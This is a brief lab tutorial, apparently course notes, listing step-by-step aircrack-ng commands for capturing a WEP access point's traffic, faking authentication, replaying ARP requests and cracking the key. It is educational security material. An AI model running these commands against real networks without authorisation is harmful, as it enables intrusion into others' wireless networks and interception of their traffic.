WEP

--> Wired Equivalent Privacy

--> Uses RC4 (Rivest Cipher 4) and Pre-Shared Key (contains hexadecimal digits)

Deliverable:

Lab Set up

Attacker’s System: Kali Linux

Target : Access Point or Router with WEP security

In Kali Linux --> Terminal

1. To put wlan0 on monitor mode

~# airmon-ng start wlan0

Here, wlan0 --> wireless interface

2. To check available access points

~# airodump-ng mon0

Here, mon0 --> interface for monitor mode

Note down BSSID, Channel number, etc.

3. To capture all the traffic of target access point

~# airodump-ng -c [channel number] --bssid [MAC address of access point] -w [filename] mon0

Here, -c --> channel

[chaneel number] à channel number used by access point

--bssid --> Basic Service Set Identification (MAC address of router)

-w --> write to file

[filename] --> name of the file to capture the traffic (capture file)

mon0 --> interface for monitor mode

4. In other terminal à we will do fake authentication

~# aireplay-ng -1 0 -a [MAC address of access point] mon0

Here, -1 --> attack mode used for fake authentication

0 --> delay retransmission time

-a --> BSSID of target (MAC address of router)

mon0 --> interface for monitor mode

5. To speed up data after association, we can use

~# aireplay-ng -3 -b [MAC address of access point] mon0

Here, -3 --> attack mode for ARP request replay attack

-b --> BSSID of target (MAC address of router)

6. In previous terminal --> When Data reaches 50,000 to 250,000 we can stop it. Now a capture file should be created in root directory.

7. Now you can crack the key

~# aircrack-ng [filename-01.cap]